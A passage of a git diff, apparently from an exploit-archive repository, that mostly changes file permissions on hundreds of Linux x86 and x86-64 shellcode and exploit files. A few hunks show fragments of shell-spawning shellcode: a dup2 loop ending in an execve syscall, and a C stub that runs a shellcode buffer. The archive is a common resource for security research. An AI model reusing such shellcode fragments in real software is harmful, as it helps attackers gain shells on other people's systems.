a/platforms/lin_x86-64/shellcode/39625.c b/platforms/lin_x86-64/shellcode/39625.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39684.c b/platforms/lin_x86-64/shellcode/39684.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39700.c b/platforms/lin_x86-64/shellcode/39700.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39718.c b/platforms/lin_x86-64/shellcode/39718.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39758.c b/platforms/lin_x86-64/shellcode/39758.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39763.c b/platforms/lin_x86-64/shellcode/39763.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39847.c b/platforms/lin_x86-64/shellcode/39847.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39869.c b/platforms/lin_x86-64/shellcode/39869.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/40029.c b/platforms/lin_x86-64/shellcode/40029.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/40052.c b/platforms/lin_x86-64/shellcode/40052.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/40061.c b/platforms/lin_x86-64/shellcode/40061.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/40079.c b/platforms/lin_x86-64/shellcode/40079.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/40122.txt b/platforms/lin_x86-64/shellcode/40122.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/40139.c b/platforms/lin_x86-64/shellcode/40139.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/40808.c b/platforms/lin_x86-64/shellcode/40808.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41089.c b/platforms/lin_x86-64/shellcode/41089.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41128.c b/platforms/lin_x86-64/shellcode/41128.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41174.nasm b/platforms/lin_x86-64/shellcode/41174.nasm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41398.nasm b/platforms/lin_x86-64/shellcode/41398.nasm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41439.c b/platforms/lin_x86-64/shellcode/41439.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41468.nasm b/platforms/lin_x86-64/shellcode/41468.nasm old mode 100755 new mode 100644 index 2d436e4ee..ccf294f61 --- a/platforms/lin_x86-64/shellcode/41468.nasm +++ b/platforms/lin_x86-64/shellcode/41468.nasm @@ -69,5 +69,4 @@ dup2loop: ; Call the Execve syscall mov al, 59 - syscall - \ No newline at end of file + syscall \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/41477.c b/platforms/lin_x86-64/shellcode/41477.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41498.nasm b/platforms/lin_x86-64/shellcode/41498.nasm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41503.nasm b/platforms/lin_x86-64/shellcode/41503.nasm old mode 100755 new mode 100644 index 0964d4e5e..5711d32ab --- a/platforms/lin_x86-64/shellcode/41503.nasm +++ b/platforms/lin_x86-64/shellcode/41503.nasm @@ -49,5 +49,4 @@ _start: push rdi push rsp pop rsi - syscall - \ No newline at end of file + syscall \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/41509.nasm b/platforms/lin_x86-64/shellcode/41509.nasm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41510.nsam b/platforms/lin_x86-64/shellcode/41510.nsam old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41750.txt b/platforms/lin_x86-64/shellcode/41750.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41883.txt b/platforms/lin_x86-64/shellcode/41883.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/41970.asm b/platforms/lin_x86-64/shellcode/41970.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/42126.c b/platforms/lin_x86-64/shellcode/42126.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/42179.c b/platforms/lin_x86-64/shellcode/42179.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/42339.c b/platforms/lin_x86-64/shellcode/42339.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/42485.c b/platforms/lin_x86-64/shellcode/42485.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/42522.c b/platforms/lin_x86-64/shellcode/42522.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/42523.c b/platforms/lin_x86-64/shellcode/42523.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/42791.c b/platforms/lin_x86-64/shellcode/42791.c old mode 100755 new mode 100644 index 8f3444adf..7a6bebd8e --- a/platforms/lin_x86-64/shellcode/42791.c +++ b/platforms/lin_x86-64/shellcode/42791.c @@ -69,4 +69,4 @@ int (*ret)() = (int(*)())code; ret(); -} +} \ No newline at end of file diff --git a/platforms/lin_x86/dos/38763.txt b/platforms/lin_x86/dos/38763.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/dos/39669.txt b/platforms/lin_x86/dos/39669.txt old mode 100755 new mode 100644 index 0d5b09c38..e56a7820d --- a/platforms/lin_x86/dos/39669.txt +++ b/platforms/lin_x86/dos/39669.txt @@ -140,4 +140,4 @@ Discussion Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless on local attacks for i386 and x86_32 systems when the attackers are able to attack applications that they can lauch. -Hector Marco - http://hmarco.org \ No newline at end of file +Hector Marco - http://hmarco.org \ No newline at end of file diff --git a/platforms/lin_x86/local/15916.c b/platforms/lin_x86/local/15916.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/local/26709.txt b/platforms/lin_x86/local/26709.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/local/37724.asm b/platforms/lin_x86/local/37724.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/local/42273.c b/platforms/lin_x86/local/42273.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/local/42274.c b/platforms/lin_x86/local/42274.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/local/42276.c b/platforms/lin_x86/local/42276.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/local/9542.c b/platforms/lin_x86/local/9542.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/remote/20032.txt b/platforms/lin_x86/remote/20032.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/remote/269.c b/platforms/lin_x86/remote/269.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/remote/3615.c b/platforms/lin_x86/remote/3615.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13307.c b/platforms/lin_x86/shellcode/13307.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13308.c b/platforms/lin_x86/shellcode/13308.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13309.asm b/platforms/lin_x86/shellcode/13309.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13310.c b/platforms/lin_x86/shellcode/13310.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13311.c b/platforms/lin_x86/shellcode/13311.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13312.c b/platforms/lin_x86/shellcode/13312.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13313.c b/platforms/lin_x86/shellcode/13313.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13314.c b/platforms/lin_x86/shellcode/13314.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13315.c b/platforms/lin_x86/shellcode/13315.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13316.c b/platforms/lin_x86/shellcode/13316.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13317.s b/platforms/lin_x86/shellcode/13317.s old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13318.s b/platforms/lin_x86/shellcode/13318.s old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13319.s b/platforms/lin_x86/shellcode/13319.s old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13321.c b/platforms/lin_x86/shellcode/13321.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13322.c b/platforms/lin_x86/shellcode/13322.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13323.c b/platforms/lin_x86/shellcode/13323.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13324.c b/platforms/lin_x86/shellcode/13324.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13325.c b/platforms/lin_x86/shellcode/13325.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13326.c b/platforms/lin_x86/shellcode/13326.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13327.c b/platforms/lin_x86/shellcode/13327.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13329.c b/platforms/lin_x86/shellcode/13329.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13330.c b/platforms/lin_x86/shellcode/13330.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13331.c b/platforms/lin_x86/shellcode/13331.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13332.c b/platforms/lin_x86/shellcode/13332.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13333.txt b/platforms/lin_x86/shellcode/13333.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13334.txt b/platforms/lin_x86/shellcode/13334.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13335.c b/platforms/lin_x86/shellcode/13335.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13336.c b/platforms/lin_x86/shellcode/13336.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13337.c b/platforms/lin_x86/shellcode/13337.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13338.c b/platforms/lin_x86/shellcode/13338.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13339.asm b/platforms/lin_x86/shellcode/13339.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13340.c b/platforms/lin_x86/shellcode/13340.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13341.c b/platforms/lin_x86/shellcode/13341.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13342.c b/platforms/lin_x86/shellcode/13342.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13343.asm b/platforms/lin_x86/shellcode/13343.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13344.c b/platforms/lin_x86/shellcode/13344.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13345.c b/platforms/lin_x86/shellcode/13345.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13346.s b/platforms/lin_x86/shellcode/13346.s old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13347.c b/platforms/lin_x86/shellcode/13347.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13348.c b/platforms/lin_x86/shellcode/13348.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13349.c b/platforms/lin_x86/shellcode/13349.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13350.c b/platforms/lin_x86/shellcode/13350.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13351.c b/platforms/lin_x86/shellcode/13351.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13352.c b/platforms/lin_x86/shellcode/13352.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13353.c b/platforms/lin_x86/shellcode/13353.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13354.c b/platforms/lin_x86/shellcode/13354.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13355.c b/platforms/lin_x86/shellcode/13355.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13356.c b/platforms/lin_x86/shellcode/13356.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13357.c b/platforms/lin_x86/shellcode/13357.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13358.c b/platforms/lin_x86/shellcode/13358.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13359.c b/platforms/lin_x86/shellcode/13359.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13360.c b/platforms/lin_x86/shellcode/13360.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13361.c b/platforms/lin_x86/shellcode/13361.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13362.c b/platforms/lin_x86/shellcode/13362.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13363.c b/platforms/lin_x86/shellcode/13363.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13365.c b/platforms/lin_x86/shellcode/13365.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13366.txt b/platforms/lin_x86/shellcode/13366.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13367.c b/platforms/lin_x86/shellcode/13367.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13368.c b/platforms/lin_x86/shellcode/13368.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13369.c b/platforms/lin_x86/shellcode/13369.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13370.c b/platforms/lin_x86/shellcode/13370.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13371.c b/platforms/lin_x86/shellcode/13371.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13372.c b/platforms/lin_x86/shellcode/13372.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13373.c b/platforms/lin_x86/shellcode/13373.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13374.c b/platforms/lin_x86/shellcode/13374.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13375.c b/platforms/lin_x86/shellcode/13375.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13376.c b/platforms/lin_x86/shellcode/13376.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13377.c b/platforms/lin_x86/shellcode/13377.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13378.c b/platforms/lin_x86/shellcode/13378.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13379.c b/platforms/lin_x86/shellcode/13379.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13380.c b/platforms/lin_x86/shellcode/13380.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13381.c b/platforms/lin_x86/shellcode/13381.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13382.c b/platforms/lin_x86/shellcode/13382.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13383.c b/platforms/lin_x86/shellcode/13383.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13384.c b/platforms/lin_x86/shellcode/13384.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13385.c b/platforms/lin_x86/shellcode/13385.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13386.c b/platforms/lin_x86/shellcode/13386.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13387.c b/platforms/lin_x86/shellcode/13387.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13388.c b/platforms/lin_x86/shellcode/13388.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13389.c b/platforms/lin_x86/shellcode/13389.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13390.c b/platforms/lin_x86/shellcode/13390.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13391.c b/platforms/lin_x86/shellcode/13391.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13392.c b/platforms/lin_x86/shellcode/13392.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13393.c b/platforms/lin_x86/shellcode/13393.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13394.c b/platforms/lin_x86/shellcode/13394.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13395.c b/platforms/lin_x86/shellcode/13395.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13396.c b/platforms/lin_x86/shellcode/13396.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13397.c b/platforms/lin_x86/shellcode/13397.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13398.c b/platforms/lin_x86/shellcode/13398.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13399.c b/platforms/lin_x86/shellcode/13399.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13400.c b/platforms/lin_x86/shellcode/13400.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13402.c b/platforms/lin_x86/shellcode/13402.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13403.c b/platforms/lin_x86/shellcode/13403.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13404.c b/platforms/lin_x86/shellcode/13404.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13405.c b/platforms/lin_x86/shellcode/13405.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13406.c b/platforms/lin_x86/shellcode/13406.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13407.c b/platforms/lin_x86/shellcode/13407.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13408.c b/platforms/lin_x86/shellcode/13408.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13409.c b/platforms/lin_x86/shellcode/13409.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13410.s b/platforms/lin_x86/shellcode/13410.s old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13411.c b/platforms/lin_x86/shellcode/13411.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13412.c b/platforms/lin_x86/shellcode/13412.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13413.c b/platforms/lin_x86/shellcode/13413.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13414.c b/platforms/lin_x86/shellcode/13414.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13415.c b/platforms/lin_x86/shellcode/13415.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13416.txt b/platforms/lin_x86/shellcode/13416.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13417.c b/platforms/lin_x86/shellcode/13417.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13418.c b/platforms/lin_x86/shellcode/13418.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13419.c b/platforms/lin_x86/shellcode/13419.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13420.c b/platforms/lin_x86/shellcode/13420.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13421.c b/platforms/lin_x86/shellcode/13421.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13422.c b/platforms/lin_x86/shellcode/13422.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13423.c b/platforms/lin_x86/shellcode/13423.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13424.txt b/platforms/lin_x86/shellcode/13424.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13425.c b/platforms/lin_x86/shellcode/13425.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13426.c b/platforms/lin_x86/shellcode/13426.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13427.c b/platforms/lin_x86/shellcode/13427.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13428.c b/platforms/lin_x86/shellcode/13428.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13429.c b/platforms/lin_x86/shellcode/13429.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13430.c b/platforms/lin_x86/shellcode/13430.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13431.c b/platforms/lin_x86/shellcode/13431.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13432.c b/platforms/lin_x86/shellcode/13432.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13433.c b/platforms/lin_x86/shellcode/13433.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13434.c b/platforms/lin_x86/shellcode/13434.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13435.c b/platforms/lin_x86/shellcode/13435.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13436.c b/platforms/lin_x86/shellcode/13436.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13437.c b/platforms/lin_x86/shellcode/13437.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13438.c b/platforms/lin_x86/shellcode/13438.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13439.c b/platforms/lin_x86/shellcode/13439.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13440.c b/platforms/lin_x86/shellcode/13440.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13441.c b/platforms/lin_x86/shellcode/13441.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13442.c b/platforms/lin_x86/shellcode/13442.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13443.c b/platforms/lin_x86/shellcode/13443.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13444.c b/platforms/lin_x86/shellcode/13444.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13445.c b/platforms/lin_x86/shellcode/13445.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13446.c b/platforms/lin_x86/shellcode/13446.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13447.c b/platforms/lin_x86/shellcode/13447.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13448.c b/platforms/lin_x86/shellcode/13448.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13449.c b/platforms/lin_x86/shellcode/13449.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13450.c b/platforms/lin_x86/shellcode/13450.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13451.c b/platforms/lin_x86/shellcode/13451.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13452.c b/platforms/lin_x86/shellcode/13452.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13453.c b/platforms/lin_x86/shellcode/13453.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13454.c b/platforms/lin_x86/shellcode/13454.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13455.c b/platforms/lin_x86/shellcode/13455.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13456.c b/platforms/lin_x86/shellcode/13456.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13457.c b/platforms/lin_x86/shellcode/13457.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13458.c b/platforms/lin_x86/shellcode/13458.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13460.c b/platforms/lin_x86/shellcode/13460.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13461.c b/platforms/lin_x86/shellcode/13461.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13462.c b/platforms/lin_x86/shellcode/13462.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13548.asm b/platforms/lin_x86/shellcode/13548.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13549.c b/platforms/lin_x86/shellcode/13549.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13550.c b/platforms/lin_x86/shellcode/13550.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13551.c b/platforms/lin_x86/shellcode/13551.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13553.c b/platforms/lin_x86/shellcode/13553.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13563.asm b/platforms/lin_x86/shellcode/13563.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13566.c b/platforms/lin_x86/shellcode/13566.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13572.c b/platforms/lin_x86/shellcode/13572.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13576.asm b/platforms/lin_x86/shellcode/13576.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13577.txt b/platforms/lin_x86/shellcode/13577.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13578.txt b/platforms/lin_x86/shellcode/13578.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13579.c b/platforms/lin_x86/shellcode/13579.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13586.txt b/platforms/lin_x86/shellcode/13586.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13599.txt b/platforms/lin_x86/shellcode/13599.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13600.txt b/platforms/lin_x86/shellcode/13600.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13601.txt b/platforms/lin_x86/shellcode/13601.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13602.txt b/platforms/lin_x86/shellcode/13602.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13609.c b/platforms/lin_x86/shellcode/13609.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13627.c b/platforms/lin_x86/shellcode/13627.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13628.c b/platforms/lin_x86/shellcode/13628.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13632.c b/platforms/lin_x86/shellcode/13632.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13661.txt b/platforms/lin_x86/shellcode/13661.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13669.c b/platforms/lin_x86/shellcode/13669.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13671.c b/platforms/lin_x86/shellcode/13671.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13673.c b/platforms/lin_x86/shellcode/13673.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13675.c b/platforms/lin_x86/shellcode/13675.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13676.c b/platforms/lin_x86/shellcode/13676.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13677.c b/platforms/lin_x86/shellcode/13677.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13680.c b/platforms/lin_x86/shellcode/13680.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13681.c b/platforms/lin_x86/shellcode/13681.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13682.c b/platforms/lin_x86/shellcode/13682.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13692.c b/platforms/lin_x86/shellcode/13692.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13697.c b/platforms/lin_x86/shellcode/13697.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13698.c b/platforms/lin_x86/shellcode/13698.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13702.c b/platforms/lin_x86/shellcode/13702.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13703.txt b/platforms/lin_x86/shellcode/13703.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13712.c b/platforms/lin_x86/shellcode/13712.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13715.c b/platforms/lin_x86/shellcode/13715.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86/shellcode/13716.c 